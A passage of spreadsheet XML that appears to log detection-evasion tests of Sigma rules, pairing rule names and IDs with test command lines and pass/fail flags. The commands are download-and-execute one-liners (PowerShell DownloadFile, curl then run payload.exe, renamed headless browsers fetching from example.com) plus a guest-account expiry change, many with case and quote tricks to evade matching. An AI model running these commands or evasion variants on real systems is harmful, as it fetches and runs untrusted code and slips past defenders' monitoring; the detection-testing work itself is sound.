      <c r="B280" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_susp_ps_downloadfile</t>
        </is>
      </c>
      <c r="C280" s="44" t="inlineStr">
        <is>
          <t>PowerShell DownloadFile</t>
        </is>
      </c>
      <c r="D280" s="44" t="inlineStr">
        <is>
          <t>8f70ac5f-1f6f-4f8e-b454-db19561216c5</t>
        </is>
      </c>
      <c r="E280" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -c "$wc = New-Object System.Net.WebClient; $method = 'Download' + 'File'; $wc.$method.Invoke('http://example.com/payload.exe', 'C:\Temp\payload.exe')"</t>
        </is>
      </c>
      <c r="F280" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G280" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H280" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I280" s="43" t="inlineStr">
        <is>
          <t>Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d); Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d)</t>
        </is>
      </c>
      <c r="J280" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K280" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="281" ht="15.75" customHeight="1" s="42">
      <c r="A281" s="44" t="inlineStr">
        <is>
          <t>t1104</t>
        </is>
      </c>
      <c r="B281" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_susp_ps_downloadfile</t>
        </is>
      </c>
      <c r="C281" s="44" t="inlineStr">
        <is>
          <t>PowerShell DownloadFile</t>
        </is>
      </c>
      <c r="D281" s="44" t="inlineStr">
        <is>
          <t>8f70ac5f-1f6f-4f8e-b454-db19561216c5</t>
        </is>
      </c>
      <c r="E281" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -CoMMAnd "$wc = New-Object System.Net.WebClient; $method = 'Download' + 'File'; $wc.$method.Invoke('http://example.com/payload.exe', 'C:\Temp\payload.exe')"</t>
        </is>
      </c>
      <c r="F281" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G281" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H281" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I281" s="44" t="inlineStr">
        <is>
          <t>Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d); Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d)</t>
        </is>
      </c>
      <c r="J281" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K281" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="282" ht="15.75" customHeight="1" s="42">
      <c r="A282" s="44" t="inlineStr">
        <is>
          <t>t1104</t>
        </is>
      </c>
      <c r="B282" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_susp_ps_downloadfile</t>
        </is>
      </c>
      <c r="C282" s="44" t="inlineStr">
        <is>
          <t>PowerShell DownloadFile</t>
        </is>
      </c>
      <c r="D282" s="44" t="inlineStr">
        <is>
          <t>8f70ac5f-1f6f-4f8e-b454-db19561216c5</t>
        </is>
      </c>
      <c r="E282" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -COMmAnD "$wc = New-Object System.Net.WebClient; $method = 'Download' + 'File'; $wc.$method.Invoke('http://example.com/payload.exe', 'C:\Temp\payload.exe')"</t>
        </is>
      </c>
      <c r="F282" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G282" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H282" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I282" s="44" t="inlineStr">
        <is>
          <t>Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d); Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d)</t>
        </is>
      </c>
      <c r="J282" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K282" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="283" ht="15.75" customHeight="1" s="42">
      <c r="A283" s="44" t="inlineStr">
        <is>
          <t>t1104</t>
        </is>
      </c>
      <c r="B283" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_susp_ps_downloadfile</t>
        </is>
      </c>
      <c r="C283" s="44" t="inlineStr">
        <is>
          <t>PowerShell DownloadFile</t>
        </is>
      </c>
      <c r="D283" s="44" t="inlineStr">
        <is>
          <t>8f70ac5f-1f6f-4f8e-b454-db19561216c5</t>
        </is>
      </c>
      <c r="E283" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -Command "(New-Object Net.WebClient).DownloadFile('http://example.com/payload.exe', 'C:\Temp\payload.exe')"</t>
        </is>
      </c>
      <c r="F283" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G283" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H283" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I283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83" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K283" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="284" ht="15.75" customHeight="1" s="42">
      <c r="A284" s="44" t="inlineStr">
        <is>
          <t>t1104</t>
        </is>
      </c>
      <c r="B284" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_susp_ps_downloadfile</t>
        </is>
      </c>
      <c r="C284" s="44" t="inlineStr">
        <is>
          <t>PowerShell DownloadFile</t>
        </is>
      </c>
      <c r="D284" s="44" t="inlineStr">
        <is>
          <t>8f70ac5f-1f6f-4f8e-b454-db19561216c5</t>
        </is>
      </c>
      <c r="E284" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -cOmManD "(New-Object Net.WebClient).DownloadFile('http://example.com/payload.exe', 'C:\Temp\payload.exe')"</t>
        </is>
      </c>
      <c r="F284" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G284" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H284" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I284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84" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K284" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="285" ht="15.75" customHeight="1" s="42">
      <c r="A285" s="44" t="inlineStr">
        <is>
          <t>t1104</t>
        </is>
      </c>
      <c r="B285" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_susp_ps_downloadfile</t>
        </is>
      </c>
      <c r="C285" s="44" t="inlineStr">
        <is>
          <t>PowerShell DownloadFile</t>
        </is>
      </c>
      <c r="D285" s="44" t="inlineStr">
        <is>
          <t>8f70ac5f-1f6f-4f8e-b454-db19561216c5</t>
        </is>
      </c>
      <c r="E285" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -cOmmanD "(New-Object Net.WebClient).DownloadFile('http://example.com/payload.exe', 'C:\Temp\payload.exe')"</t>
        </is>
      </c>
      <c r="F285" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G285" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H285" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I285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85" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K285" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="286" ht="15.75" customHeight="1" s="42">
      <c r="A286" s="44" t="inlineStr">
        <is>
          <t>t1104</t>
        </is>
      </c>
      <c r="B286" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_susp_ps_downloadfile</t>
        </is>
      </c>
      <c r="C286" s="44" t="inlineStr">
        <is>
          <t>PowerShell DownloadFile</t>
        </is>
      </c>
      <c r="D286" s="44" t="inlineStr">
        <is>
          <t>8f70ac5f-1f6f-4f8e-b454-db19561216c5</t>
        </is>
      </c>
      <c r="E286" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -comMAND "(New-Object Net.WebClient).DownloadFile('http://example.com/payload.exe', 'C:\Temp\payload.exe')"</t>
        </is>
      </c>
      <c r="F286" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G286" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H286" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I286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86" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K286" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="287" ht="15.75" customHeight="1" s="42">
      <c r="A287" s="44" t="inlineStr">
        <is>
          <t>t1104</t>
        </is>
      </c>
      <c r="B287" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_susp_ps_downloadfile</t>
        </is>
      </c>
      <c r="C287" s="44" t="inlineStr">
        <is>
          <t>PowerShell DownloadFile</t>
        </is>
      </c>
      <c r="D287" s="44" t="inlineStr">
        <is>
          <t>8f70ac5f-1f6f-4f8e-b454-db19561216c5</t>
        </is>
      </c>
      <c r="E287" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -c "(New-Object Net.WebClient).DownloadFile('http://example.com/payload.exe', 'C:\Temp\payload.exe')"</t>
        </is>
      </c>
      <c r="F287" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G287" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H287" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I28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287" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K287" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="288" ht="15.75" customHeight="1" s="42">
      <c r="A288" s="44" t="inlineStr">
        <is>
          <t>t1105</t>
        </is>
      </c>
      <c r="B288" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_browsers_chromium_headless_exec</t>
        </is>
      </c>
      <c r="C288" s="44" t="inlineStr">
        <is>
          <t>Browser Execution In Headless Mode</t>
        </is>
      </c>
      <c r="D288" s="44" t="inlineStr">
        <is>
          <t>ef9dcfed-690c-4c5d-a9d1-482cd422225c</t>
        </is>
      </c>
      <c r="E288" s="44" t="inlineStr">
        <is>
          <t>copy "C:\Program Files\Google\Chrome\Application\chrome.exe" "C:\temp\svchost_browser.exe" &amp;&amp; "C:\temp\svchost_browser.exe" --headless https://example.com</t>
        </is>
      </c>
      <c r="F288" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G288" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H288" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I288" s="44" t="n"/>
      <c r="J288" s="44" t="n">
        <v>1</v>
      </c>
      <c r="K288" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="289" ht="15.75" customHeight="1" s="42">
      <c r="A289" s="44" t="inlineStr">
        <is>
          <t>t1105</t>
        </is>
      </c>
      <c r="B289" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_browsers_chromium_headless_exec</t>
        </is>
      </c>
      <c r="C289" s="44" t="inlineStr">
        <is>
          <t>Browser Execution In Headless Mode</t>
        </is>
      </c>
      <c r="D289" s="44" t="inlineStr">
        <is>
          <t>ef9dcfed-690c-4c5d-a9d1-482cd422225c</t>
        </is>
      </c>
      <c r="E289" s="44" t="inlineStr">
        <is>
          <t>net user guest /expires:never</t>
        </is>
      </c>
      <c r="F289" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G289" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H289" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I289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289" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K289" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="290" ht="15.75" customHeight="1" s="42">
      <c r="A290" s="44" t="inlineStr">
        <is>
          <t>t1105</t>
        </is>
      </c>
      <c r="B290" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_browsers_chromium_headless_exec</t>
        </is>
      </c>
      <c r="C290" s="44" t="inlineStr">
        <is>
          <t>Browser Execution In Headless Mode</t>
        </is>
      </c>
      <c r="D290" s="44" t="inlineStr">
        <is>
          <t>ef9dcfed-690c-4c5d-a9d1-482cd422225c</t>
        </is>
      </c>
      <c r="E290" s="44" t="inlineStr">
        <is>
          <t>net user guest /"expires:never"</t>
        </is>
      </c>
      <c r="F290" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G290" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H290" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I290" s="4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290" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K290" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="291" ht="15.75" customHeight="1" s="42">
      <c r="A291" s="44" t="inlineStr">
        <is>
          <t>t1105</t>
        </is>
      </c>
      <c r="B291" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_browsers_chromium_headless_exec</t>
        </is>
      </c>
      <c r="C291" s="44" t="inlineStr">
        <is>
          <t>Browser Execution In Headless Mode</t>
        </is>
      </c>
      <c r="D291" s="44" t="inlineStr">
        <is>
          <t>ef9dcfed-690c-4c5d-a9d1-482cd422225c</t>
        </is>
      </c>
      <c r="E291" s="44" t="inlineStr">
        <is>
          <t>net user guest -"expires:never"</t>
        </is>
      </c>
      <c r="F291" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G291" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H291" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I291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291" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K291" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="292" ht="15.75" customHeight="1" s="42">
      <c r="A292" s="43" t="inlineStr">
        <is>
          <t>t1105</t>
        </is>
      </c>
      <c r="B292" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_browsers_chromium_headless_exec</t>
        </is>
      </c>
      <c r="C292" s="44" t="inlineStr">
        <is>
          <t>Browser Execution In Headless Mode</t>
        </is>
      </c>
      <c r="D292" s="44" t="inlineStr">
        <is>
          <t>ef9dcfed-690c-4c5d-a9d1-482cd422225c</t>
        </is>
      </c>
      <c r="E292" s="44" t="inlineStr">
        <is>
          <t>net user guest /expIreS:neVer</t>
        </is>
      </c>
      <c r="F292" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G292" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H292" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I292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292" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K292" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="293" ht="15.75" customHeight="1" s="42">
      <c r="A293" s="43" t="inlineStr">
        <is>
          <t>t1105</t>
        </is>
      </c>
      <c r="B293" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_browsers_chromium_headless_exec</t>
        </is>
      </c>
      <c r="C293" s="44" t="inlineStr">
        <is>
          <t>Browser Execution In Headless Mode</t>
        </is>
      </c>
      <c r="D293" s="44" t="inlineStr">
        <is>
          <t>ef9dcfed-690c-4c5d-a9d1-482cd422225c</t>
        </is>
      </c>
      <c r="E293" s="44" t="inlineStr">
        <is>
          <t>net user guest /ExPirEs:NEver</t>
        </is>
      </c>
      <c r="F293" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G293" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H293" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I293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293" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K293" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="294" ht="15.75" customHeight="1" s="42">
      <c r="A294" s="43" t="n"/>
      <c r="B294" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_browsers_chromium_headless_file_download</t>
        </is>
      </c>
      <c r="C294" s="44" t="inlineStr">
        <is>
          <t>File Download with Headless Browser</t>
        </is>
      </c>
      <c r="D294" s="44" t="inlineStr">
        <is>
          <t>0e8cfe08-02c9-4815-a2f8-0d157b7ed33e</t>
        </is>
      </c>
      <c r="E294" s="43" t="inlineStr">
        <is>
          <t>cmd.exe /c copy "C:\Program Files\Google\Chrome\Application\chrome.exe" C:\Temp\sysupdate.exe &amp;&amp; C:\Temp\sysupdate.exe --headless --dump-dom http://example.com/payload.txt</t>
        </is>
      </c>
      <c r="F294" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G294" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H294" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I294" s="43" t="n"/>
      <c r="J294" s="43" t="n">
        <v>1</v>
      </c>
      <c r="K294" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="295" ht="15.75" customHeight="1" s="42">
      <c r="A295" s="43" t="n"/>
      <c r="B295" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_browsers_inline_file_download</t>
        </is>
      </c>
      <c r="C295" s="44" t="inlineStr">
        <is>
          <t>File Download From Browser Process Via Inline URL</t>
        </is>
      </c>
      <c r="D295" s="44" t="inlineStr">
        <is>
          <t>94771a71-ba41-4b6e-a757-b531372eaab6</t>
        </is>
      </c>
      <c r="E295" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /c copy "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" C:\Temp\sysupdate.exe &amp;&amp; C:\Temp\sysupdate.exe http://example.com/payload.exe</t>
        </is>
      </c>
      <c r="F295" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G295" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H295" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I295" s="43" t="n"/>
      <c r="J295" s="44" t="n">
        <v>1</v>
      </c>
      <c r="K295" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="296" ht="15.75" customHeight="1" s="42">
      <c r="A296" s="43" t="n"/>
      <c r="B296" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_curl_download_exec_combo</t>
        </is>
      </c>
      <c r="C296" s="44" t="inlineStr">
        <is>
          <t>Curl Download And Execute Combination</t>
        </is>
      </c>
      <c r="D296" s="44" t="inlineStr">
        <is>
          <t>21dd6d38-2b18-4453-9404-a0fe4a0cc288</t>
        </is>
      </c>
      <c r="E296" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /c curl.exe http://example.com/payload.exe -o payload.exe &amp; payload.exe</t>
        </is>
      </c>
      <c r="F296" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G296" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H296" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I296" s="44" t="n"/>
      <c r="J296" s="44" t="n">
        <v>1</v>
      </c>
      <c r="K296" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="297" ht="15.75" customHeight="1" s="42">
      <c r="A297" s="43" t="n"/>
      <c r="B297" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_curl_download_exec_combo</t>
        </is>
      </c>
      <c r="C297" s="44" t="inlineStr">
        <is>
          <t>Curl Download And Execute Combination</t>
        </is>
      </c>
      <c r="D297" s="44" t="inlineStr">
        <is>
          <t>21dd6d38-2b18-4453-9404-a0fe4a0cc288</t>
        </is>
      </c>
      <c r="E297" s="44" t="inlineStr">
        <is>
          <t>cmd.exe -"c" curl http://example.com/payload.exe --OuTPut payload.exe &amp; payload.exe</t>
        </is>
      </c>
      <c r="F297" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G297" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H297" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I297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297" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K297" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="298" ht="15.75" customHeight="1" s="42">
      <c r="A298" s="43" t="n"/>
      <c r="B298" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_curl_download_exec_combo</t>
        </is>
      </c>
      <c r="C298" s="44" t="inlineStr">
        <is>
          <t>Curl Download And Execute Combination</t>
        </is>
      </c>
      <c r="D298" s="44" t="inlineStr">
        <is>
          <t>21dd6d38-2b18-4453-9404-a0fe4a0cc288</t>
        </is>
      </c>
      <c r="E298" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /"c" curl http://example.com/payload.exe --output payload.exe &amp; payload.exe</t>
        </is>
      </c>
      <c r="F298" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G298" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H298" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I298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298" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K298" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="299" ht="15.75" customHeight="1" s="42">
      <c r="A299" s="43" t="n"/>
      <c r="B299" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_curl_download_exec_combo</t>
        </is>
      </c>
      <c r="C299" s="44" t="inlineStr">
        <is>
          <t>Curl Download And Execute Combination</t>
        </is>
      </c>
      <c r="D299" s="44" t="inlineStr">
        <is>
          <t>21dd6d38-2b18-4453-9404-a0fe4a0cc288</t>
        </is>
      </c>
      <c r="E299" s="44" t="inlineStr">
        <is>
          <t>cmd.exe -"c" curl http://example.com/payload.exe -"-output" payload.exe &amp; payload.exe</t>
        </is>
      </c>
      <c r="F299" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G299" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H299" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I299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299" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K299" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="300" ht="15.75" customHeight="1" s="42">
      <c r="A300" s="43" t="n"/>
      <c r="B300" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_curl_download_exec_combo</t>
        </is>
      </c>
      <c r="C300" s="44" t="inlineStr">
        <is>
          <t>Curl Download And Execute Combination</t>
        </is>
      </c>
      <c r="D300" s="44" t="inlineStr">
        <is>
          <t>21dd6d38-2b18-4453-9404-a0fe4a0cc288</t>
        </is>
      </c>
      <c r="E300" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /c curl http://example.com/payload.exe &gt; payload.exe &amp; payload.exe</t>
        </is>
      </c>
      <c r="F300" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G300" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H300" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I300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0" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K300" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="301" ht="15.75" customHeight="1" s="42">
      <c r="A301" s="43" t="n"/>
      <c r="B301" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_curl_download_exec_combo</t>
        </is>
      </c>
      <c r="C301" s="44" t="inlineStr">
        <is>
          <t>Curl Download And Execute Combination</t>
        </is>
      </c>
      <c r="D301" s="44" t="inlineStr">
        <is>
          <t>21dd6d38-2b18-4453-9404-a0fe4a0cc288</t>
        </is>
      </c>
      <c r="E301" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /"c" curl http://example.com/payload.exe &gt; payload.exe &amp; payload.exe</t>
        </is>
      </c>
      <c r="F301" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G301" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H301" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I301" s="44" t="inlineStr">
        <is>
          <t>Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d); Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d)</t>
        </is>
      </c>
      <c r="J301" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K301" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="302" ht="15.75" customHeight="1" s="42">
      <c r="A302" s="43" t="n"/>
      <c r="B302" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_curl_download_exec_combo</t>
        </is>
      </c>
      <c r="C302" s="44" t="inlineStr">
        <is>
          <t>Curl Download And Execute Combination</t>
        </is>
      </c>
      <c r="D302" s="44" t="inlineStr">
        <is>
          <t>21dd6d38-2b18-4453-9404-a0fe4a0cc288</t>
        </is>
      </c>
      <c r="E302" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /C curl http://example.com/payload.exe &gt; payload.exe &amp; payload.exe</t>
        </is>
      </c>
      <c r="F302" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G302" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H302" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I302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2" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K302" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="303" ht="15.75" customHeight="1" s="42">
      <c r="A303" s="43" t="n"/>
      <c r="B303" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_curl_download_exec_combo</t>
        </is>
      </c>
      <c r="C303" s="44" t="inlineStr">
        <is>
          <t>Curl Download And Execute Combination</t>
        </is>
      </c>
      <c r="D303" s="44" t="inlineStr">
        <is>
          <t>21dd6d38-2b18-4453-9404-a0fe4a0cc288</t>
        </is>
      </c>
      <c r="E303" s="44" t="inlineStr">
        <is>
          <t>cmd.exe -"c" curl http://example.com/payload.exe &gt; payload.exe &amp; payload.exe</t>
        </is>
      </c>
      <c r="F303" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G303" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H303" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I303" s="44" t="inlineStr">
        <is>
          <t>Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d); Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d)</t>
        </is>
      </c>
      <c r="J303" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K303" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="304" ht="15.75" customHeight="1" s="42">
      <c r="A304" s="43" t="n"/>
      <c r="B304" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_curl_download_exec_combo</t>
        </is>
      </c>
      <c r="C304" s="44" t="inlineStr">
        <is>
          <t>Curl Download And Execute Combination</t>
        </is>
      </c>
      <c r="D304" s="44" t="inlineStr">
        <is>
          <t>21dd6d38-2b18-4453-9404-a0fe4a0cc288</t>
        </is>
      </c>
      <c r="E304" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -c "curl http://example.com/payload.exe -o payload.exe ; .\payload.exe"</t>
        </is>
      </c>
      <c r="F304" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G304" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H304" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I304" s="43" t="inlineStr">
        <is>
          <t>Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d); Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d)</t>
        </is>
      </c>
      <c r="J304" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K304" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="305" ht="15.75" customHeight="1" s="42">
      <c r="A305" s="43" t="n"/>
      <c r="B305" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_curl_download_exec_combo</t>
        </is>
      </c>
      <c r="C305" s="44" t="inlineStr">
        <is>
          <t>Curl Download And Execute Combination</t>
        </is>
      </c>
      <c r="D305" s="44" t="inlineStr">
        <is>
          <t>21dd6d38-2b18-4453-9404-a0fe4a0cc288</t>
        </is>
      </c>
      <c r="E305" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -Command "curl http://example.com/payload.exe -o payload.exe ; .\payload.exe"</t>
        </is>
      </c>
      <c r="F305" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G305" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H305" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I305" s="43" t="inlineStr">
        <is>
          <t>Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d); Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d)</t>
        </is>
      </c>
      <c r="J305" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K305" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="306" ht="15.75" customHeight="1" s="42">
      <c r="A306" s="43" t="n"/>
      <c r="B306" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_curl_download_exec_combo</t>
        </is>
      </c>
      <c r="C306" s="44" t="inlineStr">
        <is>
          <t>Curl Download And Execute Combination</t>
        </is>
      </c>
      <c r="D306" s="44" t="inlineStr">
        <is>
          <t>21dd6d38-2b18-4453-9404-a0fe4a0cc288</t>
        </is>
      </c>
      <c r="E306" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -C "curl http://example.com/payload.exe -o payload.exe ; .\payload.exe"</t>
        </is>
      </c>
      <c r="F306" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G306" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H306" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I306" s="43" t="inlineStr">
        <is>
          <t>Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d); Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d)</t>
        </is>
      </c>
      <c r="J306" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K306" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="307" ht="15.75" customHeight="1" s="42">
      <c r="A307" s="43" t="n"/>
      <c r="B307" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_http_appdata</t>
        </is>
      </c>
      <c r="C307" s="44" t="inlineStr">
        <is>
